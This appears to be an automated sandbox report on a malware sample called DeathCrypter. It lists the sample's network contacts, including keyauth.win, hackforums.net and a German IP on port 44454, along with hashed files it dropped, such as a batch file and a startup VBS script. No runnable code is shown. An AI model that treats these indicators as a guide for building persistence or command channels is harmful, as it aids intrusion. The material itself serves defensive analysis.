US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
NL 23.62.61.160:443 www.bing.com tcp
US 8.8.8.8:53 keyauth.win udp
US 172.67.72.57:443 keyauth.win tcp
US 8.8.8.8:53 57.72.67.172.in-addr.arpa udp
US 8.8.8.8:53 hackforums.net udp
US 104.23.132.78:443 hackforums.net tcp
US 8.8.8.8:53 challenges.cloudflare.com udp
US 104.17.2.184:443 challenges.cloudflare.com tcp
US 8.8.8.8:53 78.132.23.104.in-addr.arpa udp
US 104.17.2.184:443 challenges.cloudflare.com tcp
US 8.8.8.8:53 184.2.17.104.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
DE 193.161.193.99:44454 tcp
US 8.8.8.8:53 99.193.161.193.in-addr.arpa udp
US 8.8.8.8:53 www.youtube.com udp
GB 216.58.204.78:443 www.youtube.com tcp
GB 216.58.204.78:443 www.youtube.com udp
US 8.8.8.8:53 i.ytimg.com udp
GB 172.217.169.86:443 i.ytimg.com tcp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
GB 142.250.200.2:443 googleads.g.doubleclick.net tcp
US 8.8.8.8:53 static.doubleclick.net udp
GB 142.250.200.2:443 googleads.g.doubleclick.net udp
US 8.8.8.8:53 jnn-pa.googleapis.com udp
US 8.8.8.8:53 yt3.ggpht.com udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 78.204.58.216.in-addr.arpa udp
US 8.8.8.8:53 99.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 86.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 2.200.250.142.in-addr.arpa udp
GB 142.250.187.196:443 www.google.com tcp
GB 142.250.180.1:443 yt3.ggpht.com tcp
GB 142.250.187.202:443 jnn-pa.googleapis.com tcp
GB 216.58.213.6:443 static.doubleclick.net tcp
GB 142.250.187.202:443 jnn-pa.googleapis.com udp
US 8.8.8.8:53 196.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 195.212.58.216.in-addr.arpa udp
US 8.8.8.8:53 1.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 202.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 6.213.58.216.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 57.15.31.184.in-addr.arpa udp
US 8.8.8.8:53 play.google.com udp
GB 142.250.179.238:443 play.google.com tcp
GB 142.250.179.238:443 play.google.com udp
US 8.8.8.8:53 238.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
GB 142.250.187.194:443 googleads.g.doubleclick.net udp
US 8.8.8.8:53 194.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 85.65.42.20.in-addr.arpa udp

Files

memory/5112-0-0x00007FFECB833000-0x00007FFECB835000-memory.dmp

memory/5112-1-0x0000000000EC0000-0x00000000018D8000-memory.dmp

memory/5112-2-0x00007FFECB830000-0x00007FFECC2F1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\DeathCrypter.exe

MD5 88575400ce1bd139f89d3a66aaf8e83d
SHA1 ccf33a9f0002cbcf11bc1db4f39b382d083d120a
SHA256 2fd42ebaabde3fd44429da6f803ca202a543208be7ec1162360375504ccf2c63
SHA512 c9b2e316b4b372a93191745ae38cffc7b99b857c3bea52766fa3063edc88bd7ba4fba5cfd40178a0fecb43f322b29b249f5bd15cb6df3b2836931cba30b3f46d

C:\Users\Admin\AppData\Local\Temp\DeathAuthentication.bat

MD5 9a3a9a5ba169eda2919b26e78abe3718
SHA1 ef2136796b2f2c88a9826968e14a72d34faff667
SHA256 2c7178b4b84c0c6c8e16495b665aa5f1ed22982e13fe1769feada527be6caefe
SHA512 e0a70678715e4a8679673b1a99c2850769a34a00803f8ba25b40651c557fe770af94a5c60bdb4c33c33e664d3f4cd029e0e63ecb3c8ccd49a2d508dc92f43829

memory/1968-18-0x00007FFECB830000-0x00007FFECC2F1000-memory.dmp

memory/1968-19-0x0000021938070000-0x00000219395E6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3c34c34q.hpw.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4920-29-0x0000019DEF8F0000-0x0000019DEF912000-memory.dmp

memory/4920-30-0x0000019DEF970000-0x0000019DEF9B4000-memory.dmp

memory/4920-31-0x0000019DEFD90000-0x0000019DEFE06000-memory.dmp

memory/1968-32-0x000002193B140000-0x000002193B141000-memory.dmp

memory/1968-33-0x0000021953E00000-0x0000021954012000-memory.dmp

memory/1968-34-0x0000021954010000-0x0000021954182000-memory.dmp

memory/1968-35-0x0000021954180000-0x0000021954230000-memory.dmp

memory/1968-36-0x0000021953A30000-0x0000021953A42000-memory.dmp

memory/4920-39-0x0000019DEF8E0000-0x0000019DEF8E8000-memory.dmp

memory/5112-38-0x000000001CAD0000-0x000000001CBD2000-memory.dmp

memory/5112-40-0x00007FFECB830000-0x00007FFECC2F1000-memory.dmp

memory/4920-41-0x0000019DEF920000-0x0000019DEF96C000-memory.dmp

memory/1968-44-0x0000021954480000-0x00000219544BC000-memory.dmp

memory/1968-54-0x0000021955650000-0x00000219558F6000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 661739d384d9dfd807a089721202900b
SHA1 5b2c5d6a7122b4ce849dc98e79a7713038feac55
SHA256 70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf
SHA512 81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

C:\Users\Admin\AppData\Roaming\$phantom-startup_str_253.vbs

MD5 adb4e7e96aefc67b94bb3e676915774e
SHA1 6baba5a6b240e6336b9a283645bc513857ba14f2
SHA256 8490327819d06cc08f4fa60fccee5fc6a2f35a5ab0750c077ff7abd626f751d9
SHA512 42b71e3f12064086602de088e2142afa7b05b4853ba8c1c739c333582779ccada58b648d96e499a411b44a5aa8367859279bbd473c8ea3e15aae487a2737e4cd

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 4158365912175436289496136e7912c2
SHA1 813d11f772b1cfe9ceac2bf37f4f741e5e8fbe59
SHA256 354de4b033ba6e4d85f94d91230cb8501f62e0a4e302cd4076c7e0ad73bedbd1
SHA512 74b4f7b24ad4ea395f3a4cd8dbfae54f112a7c87bce3d286ee5161f6b63d62dfa19bb0d96bb7ed1c6d925f5697a2580c25023d5052c6a09992e6fd9dd49ea82b

\??\pipe\LOCAL\crashpad_2756_AXEPNFBFKDCYRGAT

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 ce4c898f8fc7601e2fbc252fdadb5115
SHA1 01bf06badc5da353e539c7c07527d30dccc55a91
SHA256 bce2dfaa91f0d44e977e0f79c60e64954a7b9dc828b0e30fbaa67dbe82f750aa
SHA512 80fff4c722c8d3e69ec4f09510779b7e3518ae60725d2d36903e606a27ec1eaedbdbfac5b662bf2c19194c572ccf0125445f22a907b329ad256e6c00b9cf032c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 2eb785caa7786594cff54002c921aed0
SHA1 09301ba9cc7deebab9f26f10a232ed20378855e2
SHA256 2d99c14c890d35bc022cc8429d242ed29be08d110ef283dadd7ac0494294e9d2
SHA512 7b3088e2468de2c3908db56c4d244c46aa81f6c8c6f735d112fccbb5b9a161559342e97bf7c353afce6a3b3462a2ecd8c335ef408adb07f7716ecb28f98c5818

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 005bc2ef5a9d890fb2297be6a36f01c2
SHA1 0c52adee1316c54b0bfdc510c0963196e7ebb430
SHA256 342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d
SHA512 f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22

memory/3352-102-0x0000000002910000-0x000000000293A000-memory.dmp

memory/3352-106-0x00007FFEA9930000-0x00007FFEA9940000-memory.dmp

memory/972-107-0x00007FFEA9930000-0x00007FFEA9940000-memory.dmp

memory/1564-108-0x00007FFEA9930000-0x00007FFEA9940000-memory.dmp

memory/3536-109-0x00007FFEA9930000-0x00007FFEA9940000-memory.dmp

memory/5244-130-0x00007FFEA9930000-0x00007FFEA9940000-memory.dmp

memory/2460-135-0x00007FFEA9930000-0x00007FFEA9940000-memory.dmp

memory/2704-134-0x00007FFEA9930000-0x00007FFEA9940000-memory.dmp

memory/1080-141-0x00007FFEA9930000-0x00007FFEA9940000-memory.dmp

memory/4636-144-0x00007FFEA9930000-0x00007FFEA9940000-memory.dmp

memory/1132-146-0x00007FFEA9930000-0x00007FFEA9940000-memory.dmp

memory/1356-145-0x00007FFEA9930000-0x00007FFEA9940000-memory.dmp

memory/2204-142-0x00007FFEA9930000-0x00007FFEA9940000-memory.dmp

memory/1840-140-0x00007FFEA9930000-0x00007FFEA9940000-memory.dmp

memory/4924-138-0x00007FFEA9930000-0x00007FFEA9940000-memory.dmp

memory/1416-143-0x00007FFEA9930000-0x00007FFEA9940000-memory.dmp

memory/2712-139-0x00007FFEA9930000-0x00007FFEA9940000-memory.dmp

memory/1724-137-0x00007FFEA9930000-0x00007FFEA9940000-memory.dmp

memory/4896-148-0x00007FFEA9930000-0x00007FFEA9940000-memory.dmp

memory/3372-147-0x00007FFEA9930000-0x00007FFEA9940000-memory.dmp

memory/2924-133-0x00007FFEA9930000-0x00007FFEA9940000-memory.dmp

memory/1880-136-0x00007FFEA9930000-0x00007FFEA9940000-memory.dmp

memory/920-131-0x00007FFEA9930000-0x00007FFEA9940000-memory.dmp

memory/1952-132-0x00007FFEA9930000-0x00007FFEA9940000-memory.dmp

memory/2192-154-0x00007FFEA9930000-0x00007FFEA9940000-memory.dmp

memory/1272-155-0x00007FFEA9930000-0x00007FFEA9940000-memory.dmp

memory/1068-156-0x00007FFEA9930000-0x00007FFEA9940000-memory.dmp

memory/2448-157-0x00007FFEA9930000-0x00007FFEA9940000-memory.dmp

memory/2252-158-0x00007FFEA9930000-0x00007FFEA9940000-memory.dmp

memory/1440-159-0x00007FFEA9930000-0x00007FFEA9940000-memory.dmp

memory/1756-175-0x000001EE5DEB0000-0x000001EE5DEC8000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

MD5 1e8e2076314d54dd72e7ee09ff8a52ab
SHA1 5fd0a67671430f66237f483eef39ff599b892272
SHA256 55f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f
SHA512 5b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

MD5 0b990e24f1e839462c0ac35fef1d119e
SHA1 9e17905f8f68f9ce0a2024d57b537aa8b39c6708
SHA256 a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a
SHA512 c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

MD5 ceb7caa4e9c4b8d760dbf7e9e5ca44c5
SHA1 a3879621f9493414d497ea6d70fbf17e283d5c08
SHA256 98c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9
SHA512 1eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

MD5 7d612892b20e70250dbd00d0cdd4f09b
SHA1 63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5
SHA256 727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02
SHA512 f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

MD5 8abf2d6067c6f3191a015f84aa9b6efe
SHA1 98f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7
SHA256 ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea
SHA512 c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

MD5 f313c5b4f95605026428425586317353
SHA1 06be66fa06e1cffc54459c38d3d258f46669d01a
SHA256 129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b
SHA512 b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 b2b462d0593a3b12df9d70bf35284685
SHA1 c28b002cc315dd52ba6e880893e39a025fb860e3
SHA256 29fc5ec10a7b224c2278b499de924f971920121d90f4e966bc1883fe4e2851f2
SHA512 66baaf8fc2604bb0a22d3f312c04c7bee77ed6707ec28b398647f8c44053a7083f6c0b37a7055cf15c6600e098bdf6fdba08e21ff51b27e85dbe0fb6c9ba8e3d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 e4bdb31d6fc53a0688ed942012c2f9e0
SHA1 3731b3ec16a97f4f761cfb96cb70721a6b518b98
SHA256 fd4d3dfd887f441868796762d598fc08c045e96456e6f5565d1b7f99acf31caa
SHA512 8f873f1f58f2df5addb12cb5333d429b9ad43c6b055593390e11fc0b7a906af4668886df098c799997ec454108d083a19137cfd298ef011213635a3e3d9d05e2

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

MD5 0ebbe9b663931a08aa357da6589eef36
SHA1 3c95b87174ac111a889937f8aa800e3dfa40bda4
SHA256 c0d682a177a8560dd17550705075fac71f7dcc5f73898f2ea964b9324218ff95
SHA512 c81e95b177de8106146d92f3de31965c7f7671c19c33b8370f0e4360bdf051fbcce005bc154d88eacdcae12926f8d12d70ad92950a1a41b2140e140417539882

memory/1968-354-0x00007FFECB830000-0x00007FFECC2F1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 05809b632073149dd24562076b417e5b
SHA1 a2ee2bbb0b96c8ad5d976d55a1df64565987ded9
SHA256 5fa3a93b9e18176c90a67cd7c8e3b2d61377f9e6f1b61d7aca3dc4c2d43a7d07
SHA512 43d2aa0eb28a4a966ceec0f2fa7706e9bd11f18aa823e3d8882f4d05b8dc26baee663fe4f64805f11e3daa6183080f6ee516a70c78e5984f3e56ceec36479906

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 57f6c2e51e22d428f5dfd4483ea2da34
SHA1 05bf521e4ca93132663840255625272b4eba2c9d
SHA256 cbdc2a1c8251e9d9a0c96144476d8915d74712de01e3a7106628747550d5201a
SHA512 8c52aab1e8a76dcebbb26d4c09dc15720a6794a7434a3a3464f375458664d9ba56ef2f8870b507bf1cf38c1f71bfbc7811e37226c66dfe383f595120691b2113

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749

MD5 ac8713678be2151ac36e58f29e950718
SHA1 b9b36147c199dc206778a1b56198d4512292ac8b
SHA256 90e055d4094ed375489a9aeca5d9bd0988fb893e11e7ddd3ef2ec6e6e544c2ae
SHA512 a2cc531a8f63130691aad2ad907b0b2f013632d0e84e4a0a1c925ec6d18b88a8e10333c325d9f4a8ba5705fa8b9c5c02c6034904970b6ec92e3292a31cf604f6

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

MD5 549deaf7120be19616bf0a83600b78fe
SHA1 fdcf90bc513deba58ad265ef6e699eb595d015a4
SHA256 39695ed671920a81bb174274c12433cf613dd0ffc9efcc72fc3f09c71bce03d2
SHA512 71b0b587abeff3bfd3de360218587583c6a0e9e229b048d2e5db3524c2912638aed5839c12eb44e99fd5a96d59f4ce9ec69ce2a7c9401ffaf2bb81b394156f55

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 b625c028eb42ff2e54fa194981979d9f
SHA1 33ae6f12077699e96d4afcb3730685bfc86f8f87
SHA256 57d45949eab47dd8edca92225f81e59a31405cae7a0eccdb81a2cbdec55ebfe8
SHA512 68f2ed42e6b591e72afef7d85f71b09725c3b65185e08cbded3b33a16b11e5e50a5cb9ac1d588976e469a8404e446a8588b5e201796ea13f2e2363d51b1c8ddc